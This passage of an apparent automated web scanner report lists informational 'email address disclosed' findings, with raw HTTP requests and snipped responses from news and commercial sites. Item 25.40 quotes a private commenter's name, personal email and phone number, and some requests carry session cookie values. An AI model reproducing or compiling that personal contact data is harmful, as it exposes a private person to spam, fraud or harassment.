Content-Type: text/html; charset=UTF-8
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny10 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.6-1+lenny10
Content-Length: 22710
Expires: Sun, 04 Sep 2011 03:32:10 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 04 Sep 2011 03:32:10 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xmlns:
...[SNIP]...
<a href="mailto:ndtvsocial@ndtv.com" class="fn fl">
...[SNIP]...

25.40. http://social.ndtv.com/tbModel/comments.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://social.ndtv.com
Path:   /tbModel/comments.php

Issue detail

The following email address was disclosed in the response:

Request

GET /tbModel/comments.php HTTP/1.1
Host: social.ndtv.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny10 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.6-1+lenny10
Expires: Sun, 04 Sep 2011 04:19:27 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 04 Sep 2011 04:19:27 GMT
Content-Length: 9200
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...

1st)ans (B)symbian belle
2nd)i like the nfc technology because we can use mobile for paying bills and multiple player gaming is also realy good .
i am sailesh dengre from jabalpur
my email id is: saileshdengre@yahoo.in
contact no. is:9806168958</span>
...[SNIP]...

25.41. http://timesofindia.indiatimes.com/articleshow_js_v11.cms  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://timesofindia.indiatimes.com
Path:   /articleshow_js_v11.cms

Issue detail

The following email address was disclosed in the response:

Request

GET /articleshow_js_v11.cms HTTP/1.1
Host: timesofindia.indiatimes.com
Proxy-Connection: keep-alive
Referer: http://timesofindia.indiatimes.com/city/mumbai/My-friend-Ganesha/articleshow/9855193.cms
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sosh=true; __utma=1.1749513380.1315103166.1315103166.1315103166.1; __utmb=1.3.10.1315103166; __utmc=1; __utmz=1.1315103166.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); RMID=32177b6a4e62e1a0; RMFD=011R02OxO106Bs|O108ih; _chartbeat2=8l1yir8xsllibs89

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
CacheControl: public
Content-Type: text/javascript
Vary: Accept-Encoding
Content-Length: 84540
Expires: Wed, 22 Aug 2012 05:42:27 GMT
Date: Sun, 04 Sep 2011 02:27:09 GMT
Connection: close


       function openSelect1(obj){
       inputs = document.getElementById("srchcmb2");
           active = document.getElementById("srchsel2");
           if(obj=='srchcmb2'){
                       if(inputs.style.display=="block")
           
...[SNIP]...
ent.getAttribute("ag")=='BCCL'){                    
                   alert("Copyright 2009 Bennett, Coleman & Co. Ltd. Use of images without permission not allowed. To buy this image, log on to www.timescontent.com or contact tss@timesgroup.com");} else if(event.srcElement.getAttribute("ag")=='BCCL - Non Copyright' || event.srcElement.getAttribute("ag")==''){
                   
                   alert("Use of images without permission not allowed. Contact tss@timesgroup.com");} else {
                   alert("Use of images without permission not allowed. Contact tss@timesgroup.com");
                   }
               }
               
               return false;
           }
       }
   } else if (document.layers){
       if (e.which!=1){
       if(!(event.srcElement.getAttribute("ag")==null)){
                   if(event.srcElement.getAttribute("ag")=='BCCL'){                    
                   
                   alert("Copyright 2009 Bennett, Coleman & Co. Ltd. Use of images without permission not allowed. To buy this image, log on to www.timescontent.com or contact tss@timesgroup.com");} else if(event.srcElement.getAttribute("ag")=='BCCL - Non Copyright' || event.srcElement.getAttribute("ag")==''){
                   
                   alert("Use of images without permission not allowed. Contact tss@timesgroup.com");} else {
                   alert("Use of images without permission not allowed. Contact tss@timesgroup.com");
                   }
               }
               

           return false;
       }
   } else if (document.getElementById){
       if (e.which!=1&&e.target.tagName=="IMG"){
           if(!(e.target.getAttribute("ag")==null)){
           
                   if(e.tar
...[SNIP]...
Attribute("ag")=='BCCL'){                    
                   
                   alert("Copyright 2009 Bennett, Coleman & Co. Ltd. Use of images without permission not allowed. To buy this image, log on to www.timescontent.com or contact tss@timesgroup.com");} else if(e.target.getAttribute("ag")=='BCCL - Non Copyright' || e.target.getAttribute("ag")==''){
                   
                   alert("Use of images without permission not allowed. Contact tss@timesgroup.com");} else {
                   alert("Use of images without permission not allowed. Contact tss@timesgroup.com");
                   }
               }
               

           return false;
       }
   }
   }
}
function associateimages(){
   for(i=0;i<document.images.length;i++)
   document.images[i].onmousedown=disableclick;
}
if(window.location.h
...[SNIP]...

25.42. http://timesofindia.indiatimes.com/new_cmtofart2_v4/9855193.cms  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://timesofindia.indiatimes.com
Path:   /new_cmtofart2_v4/9855193.cms

Issue detail

The following email address was disclosed in the response:

Request

GET /new_cmtofart2_v4/9855193.cms?msid=9855193 HTTP/1.1
Host: timesofindia.indiatimes.com
Proxy-Connection: keep-alive
Referer: http://timesofindia.indiatimes.com/city/mumbai/My-friend-Ganesha/articleshow/9855193.cms
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sosh=true; RMID=32177b6a4e62e1a0; _chartbeat2=8l1yir8xsllibs89; __utma=1.1749513380.1315103166.1315103166.1315103166.1; __utmb=1.4.10.1315103166; __utmc=1; __utmz=1.1315103166.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); RMFD=011R02OxO206Bs|O108EZ|O108FG|O108i0|O108ih

Response

HTTP/1.1 200 OK
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31
X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP01 (build: SVNTag=JBPAPP_4_3_0_GA_CP01 date=200804211746)/Tomcat-5.5
CacheControl: public
Last-Modified: Sun, 04 Sep 2011 02:58:03 GMT
Content-Language: en-US
Content-Type: text/html;charset=ISO-8859-1
Vary: Accept-Encoding
Content-Length: 10548
Expires: Sun, 04 Sep 2011 03:08:03 GMT
Date: Sun, 04 Sep 2011 03:03:14 GMT
Connection: close

<html><head><META http-equiv="Content-Type" content="text/html; charset=UTF-8"></head><body><div id="cmtMainBox"><div style="padding:10px 15px 0 15px;display:inline-block;"></div></div><br><br><div on
...[SNIP]...
<input value="mailerservice@indiatimes.com" id="toaddress" name="toaddress" type="hidden">
...[SNIP]...

25.43. http://timesofindia.indiatimes.com/nv_js_v53.cms  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://timesofindia.indiatimes.com
Path:   /nv_js_v53.cms

Issue detail

The following email address was disclosed in the response:

Request

GET /nv_js_v53.cms HTTP/1.1
Host: timesofindia.indiatimes.com
Proxy-Connection: keep-alive
Referer: http://timesofindia.indiatimes.com/city/mumbai/articlelist/-2128838597.cms
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sosh=true; __utma=1.1749513380.1315103166.1315103166.1315103166.1; __utmb=1.1.10.1315103166; __utmc=1; __utmz=1.1315103166.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31
X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP01 (build: SVNTag=JBPAPP_4_3_0_GA_CP01 date=200804211746)/Tomcat-5.5
CacheControl: public
Last-Modified: Fri, 02 Sep 2011 07:19:05 GMT
Content-Language: en-US
Content-Length: 75226
Content-Type: text/javascript;charset=ISO-8859-1
Expires: Sat, 01 Sep 2012 07:18:48 GMT
Date: Sun, 04 Sep 2011 02:25:39 GMT
Connection: close


       function openSelect1(obj){
       inputs = document.getElementById("srchcmb2");
           active = document.getElementById("srchsel2");
           if(obj=='srchcmb2'){
                       if(inputs.style.display=="block")
                       {
   
...[SNIP]...
ment.getAttribute("ag")=='BCCL'){                    
                   alert("Copyright 2009 Bennett, Coleman & Co. Ltd. Use of images without permission not allowed. To buy this image, log on to www.timescontent.com or contact tss@timesgroup.com");} else if(event.srcElement.getAttribute("ag")=='BCCL - Non Copyright' || event.srcElement.getAttribute("ag")==''){
                   
                   alert("Use of images without permission not allowed. Contact tss@timesgroup.com");} else {
                   alert("Use of images without permission not allowed. Contact tss@timesgroup.com");
                   }
               }
               
               return false;
           }
       }
   } else if (document.layers){
       if (e.which!=1){
       if(!(event.srcElement.getAttribute("ag")==null)){
                   if(event.srcElement.getAttribute("ag")=='BCCL'){                    
                   
                   alert("Copyright 2009 Bennett, Coleman & Co. Ltd. Use of images without permission not allowed. To buy this image, log on to www.timescontent.com or contact tss@timesgroup.com");} else if(event.srcElement.getAttribute("ag")=='BCCL - Non Copyright' || event.srcElement.getAttribute("ag")==''){
                   
                   alert("Use of images without permission not allowed. Contact tss@timesgroup.com");} else {
                   alert("Use of images without permission not allowed. Contact tss@timesgroup.com");
                   }
               }
               

           return false;
       }
   } else if (document.getElementById){
       if (e.which!=1&&e.target.tagName=="IMG"){
           if(!(e.target.getAttribute("ag")==null)){
           
                   if(e.target.getAttribute("ag")=='BCCL'){                    
                   
                   alert("Copyright 2009 Bennett, Coleman & Co. Ltd. Use of images without permission not allowed. To buy this image, log on to www.timescontent.com or contact tss@timesgroup.com");} else if(e.target.getAttribute("ag")=='BCCL - Non Copyright' || e.target.getAttribute("ag")==''){
                   
                   alert("Use of images without permission not allowed. Contact tss@timesgroup.com");} else {
                   alert("Use of images without permission not allowed. Contact tss@timesgroup.com");
                   }
               }
               

           return false;
       }
   }
   }
}
function associateimages(){
   for(i=0;i<document.images.length;i++)
   document.images[i].onmousedown=disableclick;
}
if(window.location.href.indexOf("c
...[SNIP]...

25.44. http://translate.google.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://translate.google.com
Path:   /

Issue detail

The following email address was disclosed in the response:

Request

GET / HTTP/1.1
Host: translate.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 04:21:18 GMT
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Language: en
X-Content-Type-Options: nosniff
Server: HTTP server (unknown)
X-XSS-Protection: 1; mode=block
Connection: close

<!DOCTYPE html><html><head><meta content="text/html; charset=UTF-8" http-equiv="content-type"><meta name=keywords content="translate, translations, translation, translator, machine translation, online
...[SNIP]...
on(){m.prm&&m.prm()},Sa=function(a){y("m",function(){m.spn(a)})},Ta=function(a){y("m",function(){m.spp(a)})};n("spn",Sa);n("spp",Ta);za("gbd4",Ra);
if(_tvb("true",e)){var Ua={g:_tvv("1"),d:_tvv(""),e:"test@fastdial.net",m:"fastdial.net",p:"//lh5.googleusercontent.com/-V_veHrrsDKY/AAAAAAAAAAI/AAAAAAAAAAA/XUAjI0bxyLA/s96-c/photo.jpg",xp:_tvv("1"),mg:"%1$s (delegated)",md:"%1$s (default)"};v.prf=Ua}
function Va(){funct
...[SNIP]...
<span id=gbi4m1>test@fastdial.net</span>
...[SNIP]...
<span class=gbps2>test@fastdial.net</span>
...[SNIP]...

25.45. http://www.asaservers.com/showpages.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.asaservers.com
Path:   /showpages.asp

Issue detail

The following email address was disclosed in the response:

Request

GET /showpages.asp HTTP/1.1
Host: www.asaservers.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 04 Sep 2011 04:23:20 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 63421
Content-Type: text/html
Cache-control: private


<HTML>
<HEAD>
<title>1U, 2U, 3U & 4U Rackmount Servers, Buy Cheap Linux DNS, AMD Istanbul & Supermicro Servers, HP Blade Server, Game & Web Servers Online - </title>
<meta http-equiv="Content-Typ
...[SNIP]...
<a href="mailto:sales@asacomputers.com">
...[SNIP]...

25.46. http://www.bangkokpost.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bangkokpost.com
Path:   /

Issue detail

The following email addresses were disclosed in the response:

Request

GET / HTTP/1.1
Host: www.bangkokpost.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=bangkok+thailand+news
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 02:24:54 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: paramsR24=deleted; expires=Sat, 04-Sep-2010 02:24:53 GMT; path=/
Content-Type: text/html; charset=utf-8
Content-Length: 94108

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head></head>
<title>Bangkok
...[SNIP]...
<a href="mailto:tippawann@Bangkokpost.co.th">
...[SNIP]...
<a href="mailto:classified@bangkokpost.co.th">
...[SNIP]...

25.47. http://www.bangkokpost.com/blogs/index.php/2011/08/30/small-parties-can-always-win-at-a-stretc  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bangkokpost.com
Path:   /blogs/index.php/2011/08/30/small-parties-can-always-win-at-a-stretc

Issue detail

The following email addresses were disclosed in the response:

Request

GET /blogs/index.php/2011/08/30/small-parties-can-always-win-at-a-stretc HTTP/1.1
Host: www.bangkokpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 04:26:06 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 23919

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="th-TH" lang="th-TH">
<h
...[SNIP]...
<a href="mailto:tippawann@Bangkokpost.co.th">
...[SNIP]...
<a href="mailto:classified@bangkokpost.co.th">
...[SNIP]...

25.48. http://www.bangkokpost.com/blogs/index.php/2011/08/31/transparency-call-for-new-women-s-fund  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bangkokpost.com
Path:   /blogs/index.php/2011/08/31/transparency-call-for-new-women-s-fund

Issue detail

The following email addresses were disclosed in the response:

Request

GET /blogs/index.php/2011/08/31/transparency-call-for-new-women-s-fund HTTP/1.1
Host: www.bangkokpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 04:26:06 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 23908

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="th-TH" lang="th-TH">
<h
...[SNIP]...
<a href="mailto:tippawann@Bangkokpost.co.th">
...[SNIP]...
<a href="mailto:classified@bangkokpost.co.th">
...[SNIP]...

25.49. http://www.bangkokpost.com/blogs/index.php/2011/09/02/in-venice-madonna-and-her-movie  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bangkokpost.com
Path:   /blogs/index.php/2011/09/02/in-venice-madonna-and-her-movie

Issue detail

The following email addresses were disclosed in the response:

Request

GET /blogs/index.php/2011/09/02/in-venice-madonna-and-her-movie HTTP/1.1
Host: www.bangkokpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 04:26:01 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 23884

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="th-TH" lang="th-TH">
<h
...[SNIP]...
<a href="mailto:tippawann@Bangkokpost.co.th">
...[SNIP]...
<a href="mailto:classified@bangkokpost.co.th">
...[SNIP]...

25.50. http://www.bangkokpost.com/blogs/index.php/2011/09/03/in-venice-jung-freud-and-the-glory-of-pr  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bangkokpost.com
Path:   /blogs/index.php/2011/09/03/in-venice-jung-freud-and-the-glory-of-pr

Issue detail

The following email addresses were disclosed in the response:

Request

GET /blogs/index.php/2011/09/03/in-venice-jung-freud-and-the-glory-of-pr HTTP/1.1
Host: www.bangkokpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 04:25:38 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 23716

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="th-TH" lang="th-TH">
<h
...[SNIP]...
<a href="mailto:tippawann@Bangkokpost.co.th">
...[SNIP]...
<a href="mailto:classified@bangkokpost.co.th">
...[SNIP]...

25.51. http://www.bangkokpost.com/business/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bangkokpost.com
Path:   /business/

Issue detail

The following email addresses were disclosed in the response:

Request

GET /business/ HTTP/1.1
Host: www.bangkokpost.com
Proxy-Connection: keep-alive
Referer: http://www.bangkokpost.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __se=YTo2OntzOjk6IlNFU1NJT05JRCI7czoyNjoiZGlmbjBkYzA1YXZxbnNyamJicjNkM2NvZTMiO3M6MTQ6IkNPT0tJRV9TRVNTSU9OIjtzOjQ6Il9fc2UiO3M6MjA6IlNUQVRVU19TVEFSVF9TRVNTSU9OIjtzOjc6IlNVQ0NFU1MiO3M6MDoiIjtOO3M6OToiY29va2llX2lwIjtzOjEzOiI1MC4yMy4xMjMuMTA2IjtzOjY6IlNUQVRVUyI7czo3OiJzdWNjZXNzIjt9; PHPSESSID=s4m8rs24o8o6s2ql7dbjgud8m7; __utma=42595382.1672749663.1315103143.1315103143.1315103143.1; __utmb=42595382.1.10.1315103143; __utmc=42595382; __utmz=42595382.1315103143.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=bangkok%20thailand%20news; _cbclose=1; _cbclose62518=1; _uid62518=2BAEE501.1; _ctout62518=1; verify=test

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 02:46:29 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Length: 53299

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Bangkok Post :
...[SNIP]...
<a href="mailto:tippawann@Bangkokpost.co.th">
...[SNIP]...
<a href="mailto:classified@bangkokpost.co.th">
...[SNIP]...

25.52. http://www.bangkokpost.com/business/telecom  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bangkokpost.com
Path:   /business/telecom

Issue detail

The following email addresses were disclosed in the response:

Request

GET /business/telecom HTTP/1.1
Host: www.bangkokpost.com
Proxy-Connection: keep-alive
Referer: http://www.bangkokpost.com/business/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: verify=test; __se=YTo2OntzOjk6IlNFU1NJT05JRCI7czoyNjoiZGlmbjBkYzA1YXZxbnNyamJicjNkM2NvZTMiO3M6MTQ6IkNPT0tJRV9TRVNTSU9OIjtzOjQ6Il9fc2UiO3M6MjA6IlNUQVRVU19TVEFSVF9TRVNTSU9OIjtzOjc6IlNVQ0NFU1MiO3M6MDoiIjtOO3M6OToiY29va2llX2lwIjtzOjEzOiI1MC4yMy4xMjMuMTA2IjtzOjY6IlNUQVRVUyI7czo3OiJzdWNjZXNzIjt9; PHPSESSID=s4m8rs24o8o6s2ql7dbjgud8m7; _cbclose62518=1; _uid62518=2BAEE501.1; verify=test; __utma=42595382.1672749663.1315103143.1315103143.1315103143.1; __utmb=42595382.2.10.1315103143; __utmc=42595382; __utmz=42595382.1315103143.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=bangkok%20thailand%20news; _cbclose=1; _ctout62518=1

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 02:34:19 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 30345

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Bangkok Post :
...[SNIP]...
<a href="mailto:tippawann@Bangkokpost.co.th">
...[SNIP]...
<a href="mailto:classified@bangkokpost.co.th">
...[SNIP]...

25.53. http://www.bangkokpost.com/classified/viewforum.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bangkokpost.com
Path:   /classified/viewforum.php

Issue detail

The following email addresses were disclosed in the response:

Request

GET /classified/viewforum.php HTTP/1.1
Host: www.bangkokpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 04:25:36 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: phpbb3_classified_u=1; expires=Mon, 03-Sep-2012 04:25:36 GMT; path=/; domain=.bangkokpost.com; HttpOnly
Set-Cookie: phpbb3_classified_k=; expires=Mon, 03-Sep-2012 04:25:36 GMT; path=/; domain=.bangkokpost.com; HttpOnly
Set-Cookie: phpbb3_classified_sid=0022f913f5b11b1d9c1e205c086f2d6d; expires=Mon, 03-Sep-2012 04:25:36 GMT; path=/; domain=.bangkokpost.com; HttpOnly
Cache-Control: private, no-cache="set-cookie"
Expires: 0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 20669

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-gb" xml:lang="en-gb">
<hea
...[SNIP]...
<a href="mailto:tippawann@Bangkokpost.co.th">
...[SNIP]...
<a href="mailto:classified@bangkokpost.co.th">
...[SNIP]...

25.54. http://www.bangkokpost.com/common/js/calendar.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bangkokpost.com
Path:   /common/js/calendar.js

Issue detail

The following email address was disclosed in the response:

Request

GET /common/js/calendar.js HTTP/1.1
Host: www.bangkokpost.com
Proxy-Connection: keep-alive
Referer: http://www.bangkokpost.com/business/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __se=YTo2OntzOjk6IlNFU1NJT05JRCI7czoyNjoiZGlmbjBkYzA1YXZxbnNyamJicjNkM2NvZTMiO3M6MTQ6IkNPT0tJRV9TRVNTSU9OIjtzOjQ6Il9fc2UiO3M6MjA6IlNUQVRVU19TVEFSVF9TRVNTSU9OIjtzOjc6IlNVQ0NFU1MiO3M6MDoiIjtOO3M6OToiY29va2llX2lwIjtzOjEzOiI1MC4yMy4xMjMuMTA2IjtzOjY6IlNUQVRVUyI7czo3OiJzdWNjZXNzIjt9; PHPSESSID=s4m8rs24o8o6s2ql7dbjgud8m7; __utma=42595382.1672749663.1315103143.1315103143.1315103143.1; __utmb=42595382.1.10.1315103143; __utmc=42595382; __utmz=42595382.1315103143.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=bangkok%20thailand%20news; _cbclose=1; _cbclose62518=1; _uid62518=2BAEE501.1; _ctout62518=1; verify=test; visit_time=110

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 02:26:57 GMT
Server: Apache/2.2.3 (Red Hat)
ETag: "2ba1b88-1afd-ae76f740"
Accept-Ranges: bytes
Vary: Accept-Encoding
Cache-Control: max-age=1296000, public, public
Content-Length: 6909
Content-Type: application/x-javascript

// Title: Timestamp picker
// Description: See the demo at url
// URL: http://www.softcomplex.com/products/tigra_calendar/
// Version: 1.0.a (Date selector only)
// Date: 12-12-2001 (mm-dd-yyyy)

...[SNIP]...
<denis@softcomplex.com>
...[SNIP]...

25.55. http://www.bangkokpost.com/forum/search.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bangkokpost.com
Path:   /forum/search.php

Issue detail

The following email addresses were disclosed in the response:

Request

GET /forum/search.php HTTP/1.1
Host: www.bangkokpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 04:24:32 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: phpbb3_forum_u=1; expires=Mon, 03-Sep-2012 04:24:32 GMT; path=/; domain=.bangkokpost.com; HttpOnly
Set-Cookie: phpbb3_forum_k=; expires=Mon, 03-Sep-2012 04:24:32 GMT; path=/; domain=.bangkokpost.com; HttpOnly
Set-Cookie: phpbb3_forum_sid=4b7e42997a4826550f71c3f558e7505f; expires=Mon, 03-Sep-2012 04:24:32 GMT; path=/; domain=.bangkokpost.com; HttpOnly
Cache-Control: private, no-cache="set-cookie"
Expires: 0
Pragma: no-cache
Connection: close
